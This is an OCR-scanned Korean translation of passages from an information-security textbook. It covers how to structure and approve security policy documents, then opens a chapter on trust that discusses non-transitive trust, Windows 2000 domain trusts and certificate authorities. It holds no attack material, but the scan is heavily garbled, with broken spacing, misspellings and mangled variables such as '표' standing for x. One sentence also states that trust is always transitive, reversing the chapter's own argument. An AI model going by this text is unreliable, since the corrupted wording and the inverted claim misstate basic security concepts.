이미 작성한 방책과 관계되는 문서들이 없는 경우에는 공통형식의 작성이 간단하게 
된다. 기관안에서 쓰는 형식이 이미 있는 경우에는 공통형식의 작성이 더 힘들어 
진다. 그러나 작성자는 이미 쓰이고 있는 지면사용형식에 맞추어 문서들의 지면사용 
형식을 설정하는것이 중요하다. 이렇게 할 때 독자는 문서의 용도를 깨닫게 되고 기 
관에서 승인하는 문서의 내용을 리해하게 된다. 각이한 부분의 형식과 순서는 이 장 
의 앞에서 이미 제시되였다. 그러나 여기서 아래와 같이 간명하게 다시 제시한다: 

• 배경 (모두) 

• 범우 1( 모두) 

• 정으 1( 모두) 

• 참고자료 (모두) 

• 조정자/문서작성자 (모두) 

• 위임자 (방책，표준，절차) 

• 효력날자 (모두) 

• 검토날자 (모두) 

• 처리 (모두) 

• 문서사항 (모두) 

• 례외조항 (방책) 

• 제재사항 (방책) 

달리 지적되지 않는한 이 부분들은 다 문서에 반영되여야 한다. 여러 문서의 구 
성요소로가 아니라 한 문서의 구성요소로 인정될수 있는 부분들이 있다. 일관성을 
유지 하기 위 하여 이 런 부분들을 모든 문서들에서 순서대 로 제시 하는것 이 좋다. 

이제부터 쓰게 되는 《문서》라는 용어는 방책，표준，절차，지침을 의미하게 

된다 
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배경. 무엇이 문서작성을 추동하였는가에 대한 정보를 제공하는 사항을 문서에 
포함시키는것이 중요하다. 새로운 방책의 경우에는 일반적으로 특정한 사건에 대한 
반응으로서 새로운 방책이 작성되기때문에 경영진의 결심을 추동한 내용을 문서에 
포함시킨다. 다른 문서들은 새로운 방책을 참고할수 있게 그리고 새로운 방책을 지 
원할수 있게 작성하는것이 필요하다. 정황의 배경을 문서에 반영하여 독자에게 참고 
할 기준들을 제공한다. 

범우 I . 어떤 정황들에서는 회사전체의 리익을 위하여 문서를 작성한다. 그러나 다 
른 문서들은 보다 적은 규모의 성원들에게 적용된다. 범위는 그 문서가 어디에 적용 
될수 있는가 하는것 을 규정 한다. 그리 하여 사람들로 하여 금 방책 이 그들에 게 적 용될 
수 있겠는가 하는것을 결정 할수 있도록 한다. 

정의. 문서는 절차를 제외하고는 될수록 기술적은어가 없어야 한다. 절차외의 문 
서에서는 기술적은어가 독자들을 혼란시키는 경향이 있다. 그러나 일정한 정황에서 
는 이 용어사용을 막을수 없다. 그러므로 문서에 이 용어에 대한 해석과 정의를 잘 
주어 야 한다. 

참고자료. 개발되는 문서에 중요한 참고자료를 제공하는 다른 방책，표준，절차 
및 지침들을 포함하는 다른 회사문서들이 포함되여야 한다. 이 문서들은 이 방책과 
이 방책을 지원하거나 혹은 이 방책이 지원하는 다른 련관된 문서들사이에 련관을 
지 어 준다. 

Web 상에 서 출판을 위 한 HTML 파일 로서 의 문서 를 작성 하는 경 우에 다른 련 관된 
문서 작성 에 하이 퍼 링 크들을 포함시키 는것 이 좋을것 이 다. 

조정자/저자. 조정자 혹은 저자는 문서를 개발하고 그에 대한 승인을 요구하는 
발기 인 이다. 발기 인을 방책문서 에 서 밝혀 주어 야 그 어 떤 질 문이 나 우려 사항이 있 어 
도 그 발기인에게 물어 볼수 있게 된다. 그러나 방책작성은 집단이 하고 실행책임은 
상급경 영 자가 하는 경 우에 는 실 지작성 자와 조정 자가 다른 사람일 수 있다. 

위임자. 상급경영진이 방책의 실현에 대하여 최종적으로 책임지기때문에 상급경 
영 진의 한 성 원이 방책 을 승인하는것 이 중요하다. 흔히 책 임 있는 상급집 행리사가 
해 당부문에 대 하여 책 임지 기 도 한다. 실례 로 정보총괄책 임 자 ( CIO ) 는 정 보체 계 방책 에 
대한 책임을 지며 재정총괄책임자 ( CFO : Chief Financial Offker ) 는 재정방책에 대한 
책임을 진다. 

표준이 회사표준으로 규정되자면 해당한 상급경영자가 그 표준을 비준하여야 한 
다. 표준이 한 부서 에 서 리용되 자면 그 부서 의 부장이 그것 을 비 준한다. 절 차는 흔 
히 부서에서만 쓰이므로 부장의 비준을 받게 된다. 지침은 회사에서 사용되지 않는 
조건에서는 비준을 받을 필요가 없다. 그런 정황에서는 기능을 책임진 상급경영 인이 
그런것들을 비준해 야 한다. 

효력날자. 이 날자는 문서의 효력을 내는 날자이 다. 방책을 개 발할 때 방책을 지 
원하며 방책의 효력을 발생하기에 앞서 사용자교육에 충분한 시간을 돌리는것이 중 
요하다. 방책 지원의 경 우에 도 사정 은 마찬가지 이 다. 그것 은 방책 을 발표할 때 사람 
들이 문서에 접근하고저 하는 사정과 관련된다. 

검토날자. 검 토날자는 문서 를 앞으로 언제 검 토한다는것 을 설정한다. 시 간이 지 
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남에 따라 모든것이 변하기때문에 검토주기를 정해야 한다. 문서에서는 시간주기를 
정하는 사항，정황과 사건으로 하여 검토가 필요한 사항들을 명기하여야 한다. 검토 
날자를 정하여 문서가 정확하며 적 당하다는것을 립증할수 있다. 

처리. 기관안에서 일정한 형식으로 문서를 분류 및 통제하는 경우에 처리와 관 
련된 특정한 지시들이 이 부분에서 제시되게 된다. 특별한 지시가 없는 경우에는 그 
부분을 삭제하거나 특별한 지시가 없다는 사항을 보충한다. 

문서사항. 방책조항은 경영진의 의도가 무엇인가 하는것을 기술하는 몇개의 본 
문행들로 구성된다. 방책사항은 길지 않으며 한개 문단을 넘지 말아야 한다. 이보다 
더 긴 경우에는 방책이 모호해 질수 있다. 방책조항들은 종업원들이 요구되는 행동 
이 어떤것인가를 알수 있도록 명백해야 한다. 

표준조항들은 표준을 제시하는데 필요한 세부내용을 제공할수 있도록 충분히 길 
어야 한다. 이것은 표준이 어떤 경우에는 아주 길어 질수 있다는것을 의미한다. 절 
차조항들은 또한 집행하여야 할 정확한 명령과 수행해야 할 과업들을 제기하기때문 
에 아주 구체적 이다. 또한 포함된 세부의 수준으로 하여 절차조항들은 아주 길어 질 
수 있 다. 

례외조항. 이 부분은 일반적으로 방책문서에만 포함된다. 례외조항들을 어떻게 
다룰것 인가에 대한 사항을 방책문서에 포함시키는것 이 좋다. 가령 한가지 방법은 례 
외를 문서화하는 공정을 세우는것이다. 이때 례외가 정황을 다투는 가장 실천적인 
방법으로 되는가에 대한 설명을 주게 된다. 이렇게 되면 해당한 담당자들이 식별되 
고 동의를 첨부하면 그 경영 인들이 제외조항들을 비준하게 된다. 례외조항들은 특별 
한 수명을 가진다. 실례로 이런 조항들은 해마다 재검토된후에 수명이 연장되여야 
한다. 

위반조항과 제재조항. 이 부분은 흔히 방책문서들에 포함된다. 기관들에서는 흔 
히 제재효과를 위하여 방책조항의 명료성을 보장하지 않는것이 일반적인 경향이다. 
적용할 제재를 결정할 때 경영진이 문제를 신축성 있게 대할수 있도록 제재조항들 
을 폭 넓게 설정하여야 한다. 실례로 기관에서는 사소한 위반행위로 하여 종업원을 
해고하지 말아야 할것이다. 인사부서와 법무담당부서는 제기된 제재를 재검토하고 
승인할 필요가 있다. 


공틍적인 개발공정의 리용 


이 모든 법률문서작성에서는 공통적인 공정이 리용될수 있다. 문서들을 개별적 
사람들이 작성하자면 많은 사람들이 망라되여야 하며 따라서 그들의 시간을 다른 
계획들과 일치시켜야 하는 경우에 문서작성의 과정은 흔히 개발과제관리방법으로 
운영된다. 그런 방법 이 필요 없지만 개발과제관리방법과 병행하여 이 공정을 리용하 
면 경영진으로 하여금 문서작성을 잘 지원하게 할수 있다. 
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그림 20-2. 문서의 규정 및 개발 


이 문서들을 규정하고 개발하는데서 리용할 공정의 한 실례는 그림 20_2에서 보는 
바와 같이 여러개의 단계들로 이루어 진다. 이 매 개발단계는 다음 단계로 넘어 가기전 
에 완성되여야 할 별개의 과업들로 구성된다. 

제1단계 : 초기 및 평가단계 

특별한 문서(방책，표준 등)의 필요성과 목적들을 서술한 서면제의가 경영진에 제출 
된다. 경영진은 지출비용과 기관리득을 정확히 계획할데 대한 이 요구를 만족스럽게 평 
가하게 된 다. 이 런 경 우에 개발림 이 조직 되 여 제2단계 에 서 서 술된바와 같이 문서 를 전개 
하고 연구한다. 그렇 지 않은 경 우에 는 사업 을 더 추진시키 지 말데 대 한 권고가 문서 제 출 
자에게 떨어 지게 된다. 

제2단계 : 전개단계 

전개단계에서는 기관의 대상계획에 자금을 투자한다. 기관에서는 새로운 림을 조직 
하든가 혹은 이전에 다른 대상계획에 참가한 림을 그대로 인입할수 있다. 이 림은 경영 
진과 함께 완성된 계획을 누가 비준하겠는가 하는것을 결정하여야 한다. 

이 림에는 리해관계를 가진 모든 당사자들과 필요한 능력을 소유한 사람들이 다 망 
라되여야 한다. 다시 말하여 이 림에는 경영진의 대표，(필요한 경우에는) 계획실현을 책 
임진 운영부서，개발림，기술전문필자와 최종적으로 봉사 및 제품접수자로 될 사용자집단 
의 한 성원이 망라된다. 

경영진의 대표를 참가시켜 그들이 기관경영진의 나머지 성원들과 법률담당 및 기타 
내부기관들과의 련락을 보장하게 할수 있다. 개 발단체는 제품 또는 봉사개 발공정 이 나 완 
성 품조립 공정 에 서 필요한 요구조건들에 필 요사항들을 계 속 추가한다. 운영 부서 일 군들은 
문서가 일단 완성되면 실제적으로 실천단계에로 들어 가도록 조직사업을 한다. 개발단계 
에서는 사용자집단을 무시할수 없다. 문서의 조건을 접수할수 없는 경우에 사용자들은 
자기들의 조건을 사전에 전면에 제기하여 개발과정을 단축할수 있다. 마지막으로 기술작 
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성자는 문서에서 쓰이는 언어를 창조하는데 방조를 준다. 대부분의 사람들은 그들이 언 
어를 잘 쓸수 있다고 생각한다. 기술전문필자들은 언어사용에 대한 전문교육을 받은 사 
탐들이다. 이 림의 성원들이 이런 역할을 자기들의 첫째가는 의무로 접수하지 않는다면 
그들은 다 보조자로 된다는것을 알아 두라. 그들은 표준의 내용에 기여한 자기들의 지식 
에 따라 그리고 문서에 비준한 자기들의 이름과 더불어 인정 받는 전문지식에 따라 보수 
를 받는것이다. 

이 럼은 개발과정의 심장이라고 할수 있다. 이 럼의 전문가들에 의하여 요구들이 제 
기되고 설계되며 언어로 표현된다. 이 사람들은 최종적인 언어표현에 대한 합의가 이루 
어 질 때까지 그 문제들을 토의검토한다. 만장일치는 좀처럼 어려운것이므로 다수가결로 
문제를 결정하게 된다. 

여러번 반복하여 초안이 개발되고 본래의 설계목적 이 달성되면 그것을 기관의 많은 
사람들이 검 토평 가하게 한다. 검 토기 간은 보통 30일 이 고 림밖의 사람들로부터 의 견을 반 
영해 넣게 된다. 

이 검토기간에 문서는 모의실험에서 검토되여야 한다. 실례로 개발되고 있는 문서가 
절차에 관한것이라면 경험이 많지 않은 사람도 절차사항에 기초하여 과업들을 성과적으 
로 수행할수 있 어 야 한다. 그들이 잘 수행할수 없는 경 우에 는 문서 에 부족점 이 생 겨 그 
것 을 퇴 치 해 야만 비 준을 받을수 있는것 이 다. 개발림 에 서 문서 를 검 토하고 문서 가 기 술적 
으로 완성되 였 다고 하는 경 우에 는 계 3단계 로 넘 긴 다. 

제3단계 : 비준단계 

설계단계가 끝난 다음에는 기관안의 해당한 부서에 문서를 넘긴다. 일부 기관들에서 
는 방책비준방법을 일정한 형식으로 규정하지만 다른 기관들에서는 그렇게 하지 않는다. 
개발단계에서는 비준단체 혹은 비준성원을 정할 필요가 있다. 

문서를 비준부서에 제출한다. 거기서는 개발기간에 중요하게 고려해야 할 문제들을 
강조하면서 개 발공정 에 대 한 토론을 계 속한다. 비 준부서 는 문서를《 비밀투표》로 결정 
하며 부정적 인 문계들은 문서의 비준에 앞서 제 기 하여 해결하여 야 한다. 

제4단계 : 발표단계 

마지막으로 필요하다면 문서를 번역하여 기관안에서 발표한다. 이때 문서는 효력발 
생 날자애까지 이르러 실현준비 가 다 된다. 어떤 정황에서는 실효날자가 발표날자로 될수 
있 다. 

제5단계 : 실현 

실현기간에 이 새로운 문서에 해당한 여러 그름들은 그 문서를 실현하기 시작한다. 
이 실현은 문서가 어디에 쓰이는가에 따라 각이하게 된다. 실례로 사용자의 견해는 운영 
부서집단의 견해와 다를수 있다. 문서가 사용될 때 사람들로 하여금 그에 대한 평가와 
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질문을 조정자에게 보내도록 하여야 한다. 이 평가들은 검토단계 또는 유지단계에서 중 
요한것 으로 될것 이 다. 

제6단계 : 유지단계 

개발단계에서 결정된대로 문서를 검토날자에 검토한다. 이 검토기간에 문서의 지속 
적인 실행가능성이 결정된다. 실행성이 결정되여 변화시켜야 할 필요가 제기되는 경우에 
그림은 계2단계의 개발주기를 가동시켜 그 주기를 다시 시작한다. 

O 야 

-U- ―I 


이 장에서는 정보보안에서 방책이 왜 중요한가 그리고 그 방책의 개발과 관련된 일 
부 문제점들과 분야들에 대하여 보았다. 정보보안방책은 기관의 지적재부나 다른 정보자 
산을 보호하기 위하여 경영진이 바라는것은 무엇인가를 밝힌다. 표준을 리용하여 공통적 
이며 접수되는 기준을 설정함으로써 모든 사람들이 그것을 리용하여 방책을 실현하게 한 
다. 절차는 세부들 즉 실현방법을 제공하며 지침은 경영진이 실현하고저 하는것을 밝혀 
준 다. 

방책은 해당 기관의 성원들이 어떻게 행동해야 하는가를 밝히기때문에 그 기관에서 
필수적 이며 중요한 한 부분으로 된다. 방책은 정보보안관리자에게 기관에서 중요한것은 
무엇이며 그것을 위해 어떤 사업을 해야 하는가를 알려 준다. 
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제 2 1 장. 신 릐 문 제 


레이 캐플런 

최근에 보안과 관련된 바그에 대한 보도들이 소식통으로 계속 퍼지고 있다. 너무도 
의견이 분분하여 핵심문제를 주시하기는 고사하고 지적하기도 어려운 형편이다. 무엇을 
믿으며 왜 그것을 믿는가 하는 단순한 문제조차 종종 도외시된다. 

더우기 기초시설들사이 및 기초시설내에서의 신뢰관계들의 필요성도 종종 스쳐보내 
고 있다. 신뢰와 그 중요성에 관한 핵심문제도 이따금 다 잊어버리군 한다. 보안은 신뢰 
문제이다. 이 장에서는 신뢰와 신뢰관계의 특성을 밝히고 신뢰를 리용하여 어떻게 안전 
한 하부구조를 축성하겠는가에 대하여 론의하게 된다. 


신릐 문제란 


신뢰는 보안에서 핵심문제 이다. 그러나 안전한 하부구조를 구축해야 하는 경우에 신 
뢰에 대하여 단순히 리해하는것으로는 문제를 크게 해결할수 없다. 기관의 성원들，기관 
과 그 성원의 고객들은 하부구조의 보안에 대하여 믿고 있다. 그런데 이상하지만 의존하 
지 말아야 한다. 사실 사람들은 계속 신뢰에 대하여 정확한 립장을 가지고 있지 못하며 
흔히 잘못된 신뢰에 기초하고 있다. 

이런 문제를 더 론하기에 앞서 신뢰란 무엇이며 신뢰를 리용하여 신뢰성 있는 하부 
구조를 어떻게 구죽하고 유지하는가 하는것을 리해하는것이 중요하다. 

신릐의 정의 

사전에서는 신뢰를 다른 사람 혹은 사물의 정직성，무결성，신뢰성，공정성 등에 대 
한 확고한 믿음이나 신용이라고 각이하게 규정하고 있다. 사전에서는 또한 확실한 예상， 
기대 혹은 희망，안겨 주는 책임，생겨 나는 확신에 대하여 서술하고 있다. 이것은 관계 
들의 발전을 념두에 두는것이다. 물건 또는 사람을 다른 사람이 돌보도록 맡기는것，어떤 
사람에게 어떤 일을 맡겨 주는것，어떤 일이 일어 나도록 두려움없이 내 버려두는것，누 
군가에게 신뢰를 허 락하는것을 고려하라. 이 모든것들은 대부분의 사람들이 행동하는 방 
식(개인으로，시민으로，기관으로 그리고 사회적으로 또한 국부적으로，전국적으로 그리 
고 세계적 으로)에 대 한 실례 들이 다. 

인터네트，법률，전자상업거래，언어학 등에 대한 신뢰의 실세계모형문제에는 아래의 
한가지 기초정의 가 적 합하다. 

신뢰는 통신통로에서 근본적인것 이지만 그 통로를 리용하여 한 대상으로부터 다른 대상 
에로 전달될수는 없는것이다. 
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정보리론을 기초로 삼을수 있다. 

정보리론에서 정보는 지식이나 의미와는 아무런 관계도 없다. 정보리론의 견지에서 정보 
는 통신통로를 리용하여 한 대상으로부터 다른 대상에 로 전달되는것 일따름이 다. 

신뢰를 정보에 첨부된 가치로 생각하라. 

사람들이 보안문제와 관련하여 신뢰에 의거하게 되는 실례들은 콤퓨터사용과 망사용 
의 모든 경우에 있게 된다. 실례로 한 조작체계의 일정프로그람은 실행대상들을 제공해 
주는 장치에 대한 신뢰에 기초한다. TCP / IP 망규약묶음은 파케트의 원천주소(보안장치가 
원천신원의 립증을 요구하지 않는한)를 그 발신자로 볼수 있다고 확신한다. 대부분의 사 
용자몰# 그들시 접근하는 열 람기들과 Web 싸이트들이 자동적 으로 보안상《정 확한 일을 
한다》고 믿는다. 이 렇게 하여 사용자들읏 그들이 의거하는 조작체계의 일정프로그람과 
망규약묶음들을 믿는다. NSA 는 신뢰 받는 체계 또는 구성요소가 보안방책을 파피하는 
힘을 가진것 이 라고 신뢰 에 대 하여 아주 잘 요약하고 있다. 그러 나 대부분의 기관들은 신 
뢰에 대하여 이렇게 생각하지 않는다. 

개발，전개 및 리용되고 있는 (널려 있는)체계들의 보안에 관한 모든 문제들이 바로 
신뢰에 달려 있기때문에 이 신뢰라는 모호한 문제를 푸는 방법을 아는것은 매우 중요하 
다. Windows NT 와 Windows 2000과 같은 분산형 신뢰 모형 들을 가지 고 있 는 조작체 계 들과 
PKI 를 실례로 보면 될것이다. 

신릐가 아닌것 

신뢰가 아닌것에 대하여 토론해 보는것이 또한 중요하다. 신뢰에 관한 자기 글에서 
E . Gerck 박사는 매우 협소하게 정의된 어떤 실례들을 제외하고는 신뢰가 이동，분포，련 
합 혹은 대 칭적인 특성들을 가지지 않는다고 설명하고 있다. Gerck 는 간단한 실례들，수 
학적인 증명들과 실세계경험을 들어 신뢰를 설명 하고 있다. Gerck 는 보안의 실천적경험 
을 중시하기때문에 《 리론은 최종적으로 현실에 대한 부합성에 기초하여 평가되여 야 한 
다》고 한 쁠스까수학자 스따니 슬라브 레슈니 옙스끼 (Stenislaw Leshniewski ) 의 말을 인용 
하고 자기 글을 시작하였다. 

신뢰에 관한 규칙들이 항상 무시되기때문에 유닉스체계들사이의 신뢰를 처리할 때, 
공통적 인 주요하부구조들과 분포된 하부구조들을 구축할 때 그리 고 Microsoft Windows 
2000의 새 로운 보안모형 의 실 천적측면들을 다룰 때 사람들은 계 속 마음이 좋지 않아 한 
다. 이것들이 문제성 있는 분야들의 몇가지라는것을 알아두라. 

시작에 앞서 한가지 말해 둘것 이 있다. 말하자는것은 Windows 2000의 품위를 떨구 
는 문제 가 아니 라 Windows 2000이 다음과 같은 문제 들을 잘 보여 준다는것 이 다. 즉 

• 신뢰규칙들이 어떻게 빨리 깨여 지는가. 

• 신뢰모형을 평가하는 사업에 착수할 때 구체적인 세부문제들은 어떻게 되는가. 

• 규칙 들을 파피 하는 신뢰 모형 들이 제 기 하는 문제 점 들. 
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조사사업，수학적인 증명들 그리고 실세계경험에 기초한 단순한 실례들을 들면서 다 
시 말하여 Windows 2000의 기 초신뢰모형 문제 에 대 한 개 론으로부터 시 작하여 Gerck 박사 
의 주장의 하나인 이행성에 대하여 살찌 보자. 

신릐는 이행적인것이 아니다. 표가 y 를 믿고 y 가 z 를 믿는다 하여도 표가 m 자동적 
으로 믿을수는 없다. 즉 내가 당신을 믿는다는 단순한 사실은 당신이 믿는 모든 사람들 
을 내 가 믿 게 되 는 리유로는 되 지 못한다. 이 것은 PGP 모형 과 같은《 신뢰 의 망》모형 들 
의 주요한 제한요인이다. 신뢰관리문제들을 다루는 가까운 친구들 또는 동료들의 그룹을 
위한 전자우편보안쏘프트웨어 로 PGP 가 개 발되 였기때 문에 이것을 쉽게 리해할수 있는것 
이다. 신뢰성은《닫긴 그룹》안에서 매 성원이 허락하는 정도의 이행성만을 떤다. 《닫 
긴 그룹》밖에서 는 신뢰 가 존재하지 않는다. 그룹의 규모가 크므로《 믿는》그룹성 원이 
제출하는 신임장들에 대한 신뢰를 그룹에서 제한하지 않을 때에는 문제가 일어 난다. 결 
과 체 계 들이 《 관계 되 는》보증서 들에 의 거 할 때 에 는 문제 가 제 기 된 다. Windows 2000이 
그런 체계라는것은 이 체계가 이행성 있는 신뢰에 기초한 모형을 가지고 있기때문이다. 
이 행 성 있는 신뢰 가 Windows 2000체 계 에서 리용될수 있 다고 기 대하는것 은 그 작용에 대 
한 아래의 설명에서 보는바와 같이 바로 문제성이 있는것이다. 

첫째로,《일차적인 신뢰령역》들을 언급하고 있는 《Windows NT 봉사기표준》문서 
에 서 인용한 문단은 Windows NT 4.0 과 Windows 2000의 차이 들을 제 기한다. 

…신뢰령 역은 국부체계 가 사용자들을 인증하는 령 역 이 다. 다시 말하여 사용자 혹은 응용 
프로그람이 신뢰 받는 령역에 의하여 인증되면 그 인증은 이 신뢰령역을 신뢰하는 모든 령역 
들에서 접수된다. 

Windows NT 4.0 체 계 상에 서 신뢰 관계 들은 일 방적 인것 이 므로 명 백 하게 설 정 하여 야 한 
다. 두방향신뢰 가 명 백하게 설정 되 면 두개 의 단방향신뢰 들이 이 루어 진다. 이 런 류형의 
신뢰는 비이행적성격을 띠는것으로서 한 령역을 믿으면 그 령역이 믿는 다른 령역도 자 
동적 으로 믿는다는것을 의미 하지는 않는다. 

Windows NT 4.0 워 크스테 이 션에 서 《 신뢰 령 역》의 대 상은 신뢰 분야들보다 오히 려 주요 
분야를 위한 정보를 인증하는데 리용된다. 

… Windows 2000체 계 에서 매 개 새끼령역은 자동적 으로 어미령역과 두방향신뢰 관계 를 가 
진다. 기정값상 이 신뢰는 이행성 있는것으로서 한 령역을 믿는다면 그 령역 이 믿는 모든 령 
역 들도 역 시 믿 게 된 다는것 을 의 미한다. 

둘째 로 ， 《Microsoft NT 봉사기표준》문서 에 서 발취한것 은 다음과 같다. 

Windows 2000령 역 들은 함께 련결 되 여 두방향이 행 성 있는 신뢰 관계 들을 가지 는 ADS(Act 
ive Directory Server) 《나무》들을 이 룰수 있 다. 사용지 도서 신뢰관계들과 같은 정적인 《싸이 
트련결 다리》들을 설정하여 주면 ADS 《 나무》들은 뿌리 에서 함께 련결되 여 일반디 렉 터 리兄 
해와 세계목록봉사기가 있는《기업체》혹은《수림》으로 된다. 
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마지 막으로 《Microsoft 2000상급봉사기 문서》에서 발취 한것: 


한 수림의 모든 Windows 20W 령역들은 이행성 있는 신뢰로 련결되므로 같은 수림의 Wi 
ndows 20W 령역 들사이 에 한방향신뢰 들을 창조하는것 은 불가능하다. 

… Windows 2000수림령역의 신뢰 들모두가 한방향이동성 있는 신뢰들이다. 

《Microsoft 2000상급봉사기문서》에는 수림의 모든 령역들이 그 수림의 뿌리령역을 
믿 으며 령역 들사이의 신뢰통로들 모두가 이 행성 있는것 으로 정의되 여 있다고 지적되 여 
있다. 이 모든것은 우리가 알고 있는것과 크게 대립된다는것 즉 신뢰는 어떤 협소하게 
정의된 경우들을 제 외 하고는 언제 나 이동성 을 띤다는것을 알아 두라. 이 런 이 행성신뢰의 
존에 대 한 암시 그리 고 그에 동반되 는 기정행위 가 큰 난관들을 조성 한다는것만을 말해 
둔다. 전형적 인 실례인 인적 자원 ( HR ) 담당부서의 령역을 보자. HR 정보의 기밀성 으로 하여 
하부구조에 있 는 다른 모든 령 역 과의 자동적이 며 포괄적 인 령역 간신뢰 관계 가 적 합하다는 
것 은 명 백 하지 않은것 이 다. 실 례 로 HR 를 자기 의 령 역 에 로 분리 시 켜 다른 령 역 들의 HR 망 
행 정 관리자들이 남의 자원과 보호대 상들(파일들과 갈은)에 접 근하지 못하게 할수도 있 다. 

부적 당한 이 행 성신뢰 의 다른 실 례 들도 많다. 이 런 신뢰 가 왜 문제 로 되 는가，그것 을 
어떻게 다루어야 하는가 그리고 유닉스환경에서 그와 관련된 문제들에 관한 실례들은 유 
닉 스망파일체 계 와 원격 접 속설 비들에서 의 이동성신뢰 에 대 한 Marcus Ranum 의 설명 에서 
찾아 볼수 있다. 

신릐는 분배되는것이 아니다. W 와 Y 가 둘다 Z 를 믿는 경우에 W 는 자동적으로 그롭 
으로서의 Y 와 고가 하나의 그룹이 라고 믿을수 없다. 당사자의 기관과 당사자의 가장 큰 
경쟁자가 둘 다 인증국 ( CA ) 에서 인증서들을 받는다고 생각하라. 후에 그 경쟁자는 인증 
국을 통채로 사 들여 바로 당사자의 모든 정보에 접근하게 된다. 당사자의 가장 큰 경쟁 
자가 당사자의 인증서 를 무효화시키 지 않으며 당사자의 모든 정 보에 접 근할수 없 다고 자 
동적으로 믿을수는 없다. 실천적으로는(실례로 당사자의 CA 와의 계약이 침해되는 경우 
에 ) 그런 정 황에 대 하여 소송을 제 기할수도 있 다. 그러 나 CA 들과의 합의 가 이 런 우발적 
인 사고에 대비할수 없게 되였기때문에 이렇게 하기는 어려울것이다. 

또한 오직 태도를 바꾸어 다음과 같이 할수 있을것이다. 

• 위법행위를 하는 CA 와 그가 발급하는 신임장을 더는 믿지 않는다. 

• 현재는 효력 이 없는 이 신임장들을 무효화시 킨다. 

• 실현할수 있는 신뢰관계를 가지 고 있는 CA 로부터 새로운 신임장들을 받는다. 

신릐는 교제되는것이 아니다. 보는 특별한 목적으로 하여 Y 및 Z 와 맺은 동료관계를 
믿지만 자동적으로 노와 Z 를 개별적으로는 믿을수 없다. 

한 그롭(아마도 어떤 특별한 목적으로 하여 이루어 진)을 믿는다고 하여 그것이 바 
로 그 그룹안의 성원들을 다 믿을수 있다는것을 의미하지는 않는다. 특별한 목적으로 하 
여 두 경쟁자사이 에 이루어 진 동료관계를 믿는다고 생각해 보라. 그것은 동료관계와 관 
련된 문제 에 서조차 그들을 개 별적 으로 믿 을수 있 다는것 을 결코 의 미 하지 는 않는다. 
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신릐는 대칭적인것이 아니다. 표가 Y 를 믿는다고 해서 Y 가 표를 자동적으로 믿을수 
있는것은 아니다. 

즉 신뢰관계들은 자동적으로 2중방향 즉 쌍방향으로 되는것이 아니다. 신뢰는 유일 
방향 즉 비대칭적인것이다. 내가 당신을 믿는다고 하여 당신이 나를 자동적으로 믿을수 
는 없 다. 

앞에서 여 러 번 설명된바와 같이 믿는측은 믿음에서 일정한 제 한점 을 결정한다. 
믿음이 이동，분배，교제 및 대칭의 특성을 띠는 유일한 경우는 일정한 형태의 《가 
벼 운 신뢰》가 존재하게 되 는 경 우이 다. 즉 믿 는측이 그것 을 허 용하게 되 는 특정한 
경우이다. 

신릐성 

신뢰가 그 무엇에 믿음을 준다는것을 의미한다면 신뢰성은 그 믿음이 잘 구축되였다 
는것 을 의 미한다. 무엇 을 믿 는다는것 은 그것 을 가치 있 게 만든다는것 은 아니 다. 가치 있 
게 만든다는것 은 신뢰 업 무의 횡 재 이 다. 

많은 체계들과 망들을 믿을수 있지만 신뢰성 있는것은 거의 없다. 단순한 실례를 들 
어 보면 이 문제를 풀수 있을것이다. 가령 도시에 있는 일터에서 멀리 떨어 져 사는데 
대중교통수단이 거의 없거나 없다고 생각해 보자. 그러면 자동차로 일하려 가게 될것이 
다. 아무 지장도 받지 않고 자동차로 출퇴근을 아주 잘할수 있을것이라고 믿을수 있다. 
그러나 무더운 여름날 한낮에 자동차를 타고《죽음의 계곡》(캘리포니아주 남동부의 한 
건조분지-역 주)을 가로 질 러 갈수 있을것 이 라고 믿지 못할수 있 다. 도시구역 에서 는 공중 
전화실에서 전화를 걸어 방조를 받을수 있기때문에 고장이 나도 생명에 위협으로는 되지 
않는다고 볼수 있다. 그러나 죽음의 계곡을 가로 질러 려행할 때에는 방조를 받기가 매 
우 어 렵기때문에 고장이 나면 물이 없어 생명 이 위험 에 처하게 된다. 이 리하여 승용차가 
통근에 는 신뢰 성 이 있지 만 위 험 한 환경 에 서 오랜 려 행 을 하는데 는 신뢰 성 이 없 다는것 이 
확증되였다. 즉 도시구역안에서 통근을 목적으로 하여 교통용으로 리용할 때에는 자기의 
차를 믿게 된다. 

쉽 게 말하여 신뢰 는 정 황에 의 존된다. 즉 사람들은 일정한 구체 적 인 정 황에서 어 떤 
것을 믿을 결심을 하게 된다. 신뢰는 믿음에 관한것이다. 

사람들은 보안의 의 미 에서 자기 일을 정 확하게 수행해 야 할 때 체 계 들과 망들을 신 
뢰 성 이 있는것 으로 볼수 있 다. 즉 사람들은 특정한 조건에 서 체 계 들과 망들을 믿 게 된 다. 
결국 이런 믿음은 넓은 범위의 신뢰성에 이르게 된다. 이 범위의 한 끝에는 수학적증명 
에 기초한 이 주장에 대한 공식적 인 확신을 요구하는 믿음 받는 체계들이 있다. 다른 끝 
에는《그 체계는 자기일을 하고 있다》라고 말하는것 같은 오랜 기간에 걸쳐 수집된 증 
언자료들이 있다. 

사람들은 신뢰 (신뢰 성 ) 를 여 러 개 식 으로 측정할수 있는 량으로 정 의하려 고 시 도한 
다. 보안의 기 술적측면에 서 신뢰 를 정 의하려 는 다음과 같은 여 러 가지 방법 들이 있 다. 즉 

• 신뢰를퓨터보안평 가기준(또한《 오렌지책》으로 알려 진 TCSEC ) 과 이 것을 계승 
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한 공통기준 및 그에 따르는 공식검수방법들과 갈은 공식적인 기준들 

• 방화벽검수실과 같은 상업제품시험실에서 진행되는 덜 공식적인 검수 

• 공격에 견디여 낼수 있다는것을 보여 줌으로써 신뢰성이 있다는것을 증명하려고 
하는 이른바《도전싸이트들》 

• 알려 진 모든 취 약성들을 철저하게 알아 낼것을 목적으로 하는 침투시험 

• 순수 기술적수단으로 찾을수 있는것을 찾아 취약성들이 있는 곳을 밝히는 평가 

• 제 품생 산의 마지 막공정 이 끝나기 전에 부족점 을 식별 하는 쏘프트웨 어 와 하드웨 어 
의 알파판본，베 타판본 및 출하전관본 

이 모든것들은 일정한 조건에서 체계 혹은 망들을 우리가 믿을수 있다는것을 보여 
주기 위한것이다. 이 모든것의 목적은 신뢰와 믿음을 구축하여 신뢰의 수준에 이르는것 
이다. 다시 말하여 체계와 망들이 신뢰성을 띠게 되는 조건을 구축하는것이다. 실례로 
TCSEC 의 오렌지책 을포함하고 있는 이른바 레 인버우총서에 있는 많은 자료들가운데는 
